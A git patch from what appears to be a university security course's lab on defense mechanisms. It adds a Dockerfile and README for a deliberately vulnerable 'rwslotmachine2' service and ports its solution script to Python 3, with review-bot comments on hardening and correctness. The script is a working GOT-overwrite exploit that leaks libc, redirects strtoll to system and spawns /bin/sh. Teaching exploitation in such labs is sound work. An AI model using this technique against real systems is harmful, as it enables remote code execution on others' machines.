From 3ac960bf8931653eb180f3371c6cae5cf3c30d38 Mon Sep 17 00:00:00 2001
From: Bianca Ioana
Date: Wed, 11 Dec 2024 23:33:47 +0200
Subject: [PATCH] Add files for the Dockerfile and few modifications to the sol_got_overwrite.py for 02-rwslotmachine2
Signed-off-by: Bianca Ioana
---
 .dockerignore | 0
 .../02-rwslotmachine2/sol/Dockerfile | 33 +++++++++++++++++
 .../02-rwslotmachine2/sol/README.md | 17 +++++++++
 .../sol/sol_got_overwrite.py | 37 ++++++++++++-------
 4 files changed, 74 insertions(+), 13 deletions(-)
 create mode 100644 .dockerignore
 create mode 100644 chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/Dockerfile
 create mode 100644 chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/README.md
diff --git a/.dockerignore b/.dockerignore
new file mode 100644
index 0000000..e69de29
diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/Dockerfile b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/Dockerfile
new file mode 100644
index 0000000..6b7e796
--- /dev/null
+++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/Dockerfile
@@ -0,0 +1,33 @@
+# Build Stage
+FROM gcc:latest AS build
+
+# Set working directory
+WORKDIR /app
+
+# Copy the source code into the container
+COPY rwslotmachine2.c .
+
+# Compile the source code into an executable
+RUN gcc rwslotmachine2.c -o rwslotmachine2 -Wall -Wextra
+
+# Runtime Stage
+# FROM debian:bullseye-slim
+FROM ubuntu:latest
+
+# Install necessary runtime libraries
+RUN apt-get update && apt-get install -y \
+ libc6 \
+ && rm -rf /var/lib/apt/lists/*
+
+# Set working directory
+WORKDIR /app
+
+# Copy the compiled executable from the builder stage
+# COPY --from=build /app/rwslotmachine2 .
+COPY --from=build /app/rwslotmachine2 /app/rwslotmachine2
+
+# Expose the port where the program will operate
+EXPOSE 31345
+
+# Run the program
+CMD ["./rwslotmachine2"]
diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/README.md b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/README.md
new file mode 100644
index 0000000..7e14ae5
--- /dev/null
+++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/README.md
@@ -0,0 +1,17 @@
+## Building and Running
+
+1. Build the Docker image:
+ ```bash
+ docker build -t rwslotmachine2 .
+ ```
+
+
+2. Run the Docker image:
+ ```bash
+ docker run -p 31345:31345 rwslotmachine2
+ ```
+
+3. Test with the Python exploit:
+ ```bash
+ python3 sol_got_overwrite.py
+ ```
diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py
index 7c0719e..cda9db0 100644
--- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py
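Review bot: Both stages pull floating tags (`FROM gcc:latest AS build`, `FROM ubuntu:latest`), so the libc shipped in the runtime image changes whenever those tags move, and any `libc.symbols` offsets the solution script was written against will only match while the image happens to agree; pin both to a dated tag or digest and note which libc the exercise expects. The compile line `RUN gcc rwslotmachine2.c -o rwslotmachine2 -Wall -Wextra` leaves RELRO, PIE and stack-protector settings at whatever this toolchain defaults to, which for a defense-mechanisms activity is exactly what should be explicit; I would add a comment stating the intended mitigation configuration and pass the matching flags so a rebuild does not silently change the exercise. `apt-get install -y libc6` is almost certainly redundant on an Ubuntu base, which already ships libc6. No `USER` is set, so the deliberately vulnerable service runs as root inside the container; an unprivileged `USER` before `CMD` bounds what a successful overwrite can reach. Whether `EXPOSE 31345` matches the port the binary actually listens on cannot be checked from here, as rwslotmachine2.c is not in the diff.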
+++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py
@@ -13,21 +13,21 @@ def do_read(idx):
- p.recvuntil(">")
- p.sendline("1")
- p.recvuntil("index:")
- p.sendline(str(idx))
- p.recvuntil("]: ")
- return int(p.recvuntil("\n")[:-1], 16)
+ p.recvuntil(b">")
+ p.sendline(b"1")
+ p.recvuntil(b"index:")
+ p.sendline(str(idx).encode())
+ p.recvuntil(b"]: ")
+ return int(p.recvuntil(b"\n")[:-1], 16)
 def do_write(idx, value):
- p.recvuntil(">")
- p.sendline("2")
- p.recvuntil("index:")
- p.sendline(str(idx))
- p.recvuntil("value:")
- p.sendline(hex(value))
+ p.recvuntil(b">")
+ p.sendline(b"2")
+ p.recvuntil(b"index:")
+ p.sendline(str(idx).encode())
+ p.recvuntil(b"value:")
+ p.sendline(hex(value).encode())
 slots_offset = binary.symbols["slots"]
@@ -38,11 +38,22 @@ def do_write(idx, value):
 index_to_strtoll = (strtoll_got_offset - slots_offset) / 4
 libc_leak = do_read(index_to_puts)
+print(f"Libc leak: {hex(libc_leak)}")
+
 libc_base = libc_leak - libc.symbols["puts"]
+print(f"Libc base: {hex(libc_base)}")
+
 system = libc_base + libc.symbols["system"]
+print(f"System address: {hex(system)}")
+
+# Debugging the overwrite
+print(f"Overwriting GOT entry for strtoll with address: {hex(system)}")
 do_write(index_to_strtoll, system)
+# Debugging shell spawn
+print("Exploitation completed, sending /bin/sh...")
+
-p.sendline("/bin/sh")
+p.sendline(b"/bin/sh")
 p.interactive()
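Review bot: `do_read` and `do_write` carry no docstring and depend on the module-level connection `p` and on the exact menu prompts (`>`, `index:`, `]: `, `value:`) that this hunk now hard-codes as bytes; a one-liner on each, e.g. `"""Select menu option 1 and return slot idx, parsed from the hex the service prints after ']: '."""` and `"""Select menu option 2 and store value, sent as hex, into slot idx."""`, would make the protocol assumptions visible. Each `recvuntil` blocks indefinitely if a prompt never arrives, so a mismatch between the script and the container shows up as a hang rather than an error; pwntools' `recvuntil` accepts a `timeout=` argument that would turn that into a failure. The `def do_read(idx):` line itself is outside the hunk (it appears only as the header's context).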
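Review bot: `index_to_strtoll = (strtoll_got_offset - slots_offset) / 4`, the context line at the top of the hunk, is true division under Python 3, so after this commit `do_write` serialises a float and sends something like `b"12.0"` as the index; whether the service tolerates the trailing `.0` depends on how it parses the index, which is not visible here, and the companion `index_to_puts` line presumably has the same form outside the hunk. The Python 3 conversion should use `// 4` so the index stays an int. The new `print("Exploitation completed, sending /bin/sh...")` is emitted before anything confirms the write and before the command is sent, so it overstates what has happened; `print("GOT write sent; sending /bin/sh...")` would describe the state accurately.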